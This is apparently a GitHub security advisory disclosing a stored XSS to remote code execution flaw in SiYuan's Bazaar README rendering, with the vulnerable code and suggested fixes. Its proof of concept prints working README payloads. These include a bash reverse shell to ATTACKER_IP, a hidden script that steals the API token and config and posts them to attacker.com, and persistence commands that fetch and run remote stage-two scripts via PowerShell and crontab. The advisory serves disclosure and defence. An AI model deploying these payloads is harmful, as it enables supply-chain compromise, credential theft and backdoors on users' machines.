+ "details": "# Stored XSS to RCE via Unsanitized Bazaar README Rendering\n\n## Summary\n\nSiYuan's Bazaar (community marketplace) renders package README content without HTML sanitization. The backend `renderREADME` function uses `lute.New()` without calling `SetSanitize(true)`, allowing raw HTML embedded in Markdown to pass through unmodified. The frontend then assigns the rendered HTML to `innerHTML` without any additional sanitization. A malicious package author can embed arbitrary JavaScript in their README that executes when a user clicks to view the package details. Because SiYuan's Electron configuration enables `nodeIntegration: true` with `contextIsolation: false`, this XSS escalates directly to full Remote Code Execution.\n\n## Affected Component\n\n- **README rendering (backend)**: `kernel/bazaar/package.go:635-645` (`renderREADME` function)\n- **README rendering (frontend)**: `app/src/config/bazaar.ts:607` (`innerHTML` assignment)\n- **Electron config**: `app/electron/main.js:422-426` (`nodeIntegration: true`, `contextIsolation: false`)\n\n## Affected Versions\n\n- SiYuan <= 3.5.9\n- \n## Severity\n\n**Critical** — CVSS 9.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)\n\nNote: This vector requires one click (user viewing the package README), unlike the metadata vector which is zero-click.\n\n## Vulnerable Code\n\n### Backend: `kernel/bazaar/package.go:635-645`\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n luteEngine := lute.New() // Fresh Lute instance — SetSanitize NOT called\n luteEngine.SetSoftBreak2HardBreak(false)\n luteEngine.SetCodeSyntaxHighlight(false)\n linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n luteEngine.SetLinkBase(linkBase)\n ret = luteEngine.Md2HTML(string(mdData)) // Raw HTML in Markdown is PRESERVED\n return\n}\n```\n\nCompare with SiYuan's own note renderer in `kernel/util/lute.go:81`, which **does** sanitize:\n\n```go\nluteEngine.SetSanitize(true) // Notes ARE sanitized — but Bazaar README is NOT\n```\n\nThis inconsistency demonstrates that the project is aware of the Lute sanitization API but failed to apply it to Bazaar content.\n\n### Frontend: `app/src/config/bazaar.ts:607`\n\n```typescript\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response => {\n mdElement.innerHTML = response.data.html; // Unsanitized HTML injected into DOM\n});\n```\n\nThe backend returns unsanitized HTML, and the frontend blindly assigns it to `innerHTML` without any client-side sanitization (e.g., DOMPurify).\n\n### Electron: `app/electron/main.js:422-426`\n\n```javascript\nwebPreferences: {\n nodeIntegration: true,\n contextIsolation: false,\n // ...\n}\n```\n\nAny JavaScript executing in the renderer has direct access to Node.js APIs.\n\n## Proof of Concept\n\n### Step 1: Create a malicious README\n\nCreate a GitHub repository with a valid SiYuan plugin/theme/template structure. The `README.md` contains embedded HTML:\n\n```markdown\n# Helpful Productivity Plugin\n\nThis plugin helps you organize your notes with smart templates and AI-powered suggestions.\n\n## Features\n\n- Smart template insertion\n- AI-powered note organization\n- Cross-platform sync\n\n<img src=x onerror=\"require('child_process').exec('calc.exe')\">\n\n## Installation\n\nInstall via the SiYuan Bazaar marketplace.\n\n## License\n\nMIT\n```\n\nThe raw `<img>` tag with `onerror` handler is valid Markdown (HTML passthrough). The Lute engine preserves it because `SetSanitize(true)` is not called. The frontend renders it via `innerHTML`, and the broken image triggers `onerror`, executing `calc.exe`.\n\n### Step 2: Submit to Bazaar\n\nSubmit the repository to the SiYuan Bazaar via the standard community contribution process.\n\n### Step 3: One-click RCE\n\nWhen a SiYuan user browses the Bazaar, sees the package listing, and clicks on it to view the README/details, the unsanitized HTML renders in the detail panel. The `onerror` handler fires, executing arbitrary OS commands.\n\n### Escalation: Reverse shell\n\n```markdown\n# Cool Theme for SiYuan\n\nBeautiful dark theme with custom fonts.\n\n<img src=x onerror=\"require('child_process').exec('bash -c \\\"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\\\"')\">\n```\n\n### Escalation: Multi-stage payload via README\n\nA more sophisticated attack can hide the payload deeper in the README to avoid casual review:\n\n```markdown\n# Professional Note Templates\n\nA comprehensive collection of note templates for professionals.\n\n## Templates Included\n\n| Category | Count | Description |\n|----------|-------|-------------|\n| Business | 15 | Meeting notes, project plans |\n| Academic | 12 | Research notes, citations |\n| Personal | 8 | Journal, habit tracking |\n\n## Screenshots\n\n<!-- Legitimate-looking image reference -->\n<picture>\n <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://attacker.com/dark.png\">\n <source media=\"(prefers-color-scheme: light)\" srcset=\"https://attacker.com/light.png\">\n <img src=\"https://attacker.com/screenshot.png\" alt=\"Template Preview\" onload=\"\n var c = require('child_process');\n var o = require('os');\n var f = require('fs');\n var p = require('path');\n\n // Exfiltrate sensitive data\n var home = o.homedir();\n var configDir = p.join(home, '.config', 'siyuan');\n var data = {};\n\n try { data.apiToken = f.readFileSync(p.join(configDir, 'cookie.key'), 'utf8'); } catch(e) {}\n try { data.conf = JSON.parse(f.readFileSync(p.join(configDir, 'conf.json'), 'utf8')); } catch(e) {}\n try { data.hostname = o.hostname(); data.user = o.userInfo().username; data.platform = o.platform(); } catch(e) {}\n\n // Send to attacker\n var https = require('https');\n var payload = JSON.stringify(data);\n var req = https.request({\n hostname: 'attacker.com', port: 443, path: '/collect', method: 'POST',\n headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }\n });\n req.write(payload);\n req.end();\n\n // Drop persistence\n if (o.platform() === 'win32') {\n c.exec('schtasks /create /tn SiYuanSync /tr \\\"powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\\\\\\\"https://attacker.com/stage2.ps1\\\\\\\"))\\\" /sc onlogon /rl highest /f');\n } else {\n c.exec('(crontab -l 2>/dev/null; echo \\\"@reboot curl -s https://attacker.com/stage2.sh | bash\\\") | crontab -');\n }\n \">\n</picture>\n\n## Changelog\n\n- v1.0.0: Initial release\n```\n\nThis payload:\n1. Uses `onload` instead of `onerror` (fires on successful image load from attacker's server)\n2. Exfiltrates SiYuan API token, config, hostname, username, and platform info\n3. Installs cross-platform persistence (Windows scheduled task / Linux crontab)\n4. Is buried inside a legitimate-looking `<picture>` element that blends with real README content\n\n### Escalation: SVG-based payload (bypasses naive img filtering)\n\n```markdown\n## Architecture\n\n<svg onload=\"require('child_process').exec('id > /tmp/pwned')\">\n <rect width=\"100\" height=\"100\" fill=\"blue\"/>\n</svg>\n```\n\n### Escalation: Details/summary element (interactive trigger)\n\n```markdown\n## FAQ\n\n<details ontoggle=\"require('child_process').exec('whoami > /tmp/pwned')\" open>\n <summary>How do I install this plugin?</summary>\n Use the SiYuan Bazaar to install.\n</details>\n```\n\nThe `open` attribute causes `ontoggle` to fire immediately without user interaction with the element itself.\n\n## Attack Scenario\n\n1. Attacker creates a legitimate-looking GitHub repository with a SiYuan plugin/theme/template.\n2. The README contains a well-crafted payload hidden within legitimate-looking content (e.g., inside a `<picture>` tag, `<details>` block, or `<svg>`).\n3. Attacker submits the package to the SiYuan Bazaar via the community contribution process.\n4. A SiYuan user browses the Bazaar and clicks on the package to view its details/README.\n5. The backend renders the README via `renderREADME()` without sanitization.\n6. The frontend assigns the HTML to `innerHTML`.\n7. The injected JavaScript executes with full Node.js access.\n8. The attacker achieves RCE — reverse shell, data theft, persistence, etc.\n\n## Impact\n\n- **Full remote code execution** on any SiYuan desktop user who views the malicious package README\n- **One-click** — triggered by viewing package details in the Bazaar\n- **Supply-chain attack** via the official SiYuan community marketplace\n- Payloads can be deeply hidden in legitimate-looking README content, making code review difficult\n- Can steal API tokens, SiYuan configuration, SSH keys, browser credentials, and arbitrary files\n- Can install persistent backdoors across Windows, macOS, and Linux\n- Multiple HTML elements can carry payloads (`img`, `svg`, `details`, `picture`, `video`, `audio`, `iframe`, `object`, `embed`, `math`, etc.)\n- Affects all platforms: Windows, macOS, Linux\n\n## Suggested Fix\n\n### 1. Enable Lute sanitization for README rendering (`package.go`)\n\n```go\nfunc renderREADME(repoURL string, mdData []byte) (ret string, err error) {\n luteEngine := lute.New()\n luteEngine.SetSanitize(true) // ADD THIS — matches note renderer behavior\n luteEngine.SetSoftBreak2HardBreak(false)\n luteEngine.SetCodeSyntaxHighlight(false)\n linkBase := \"https://cdn.jsdelivr.net/gh/\" + ...\n luteEngine.SetLinkBase(linkBase)\n ret = luteEngine.Md2HTML(string(mdData))\n return\n}\n```\n\n### 2. Add client-side sanitization as defense-in-depth (`bazaar.ts`)\n\n```typescript\nimport DOMPurify from 'dompurify';\n\nfetchPost(\"/api/bazaar/getBazaarPackageREADME\", {...}, response => {\n mdElement.innerHTML = DOMPurify.sanitize(response.data.html);\n});\n```\n\n### 3. Long-term: Harden Electron configuration\n\n```javascript\nwebPreferences: {\n nodeIntegration: false,\n contextIsolation: true,\n sandbox: true,\n}\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments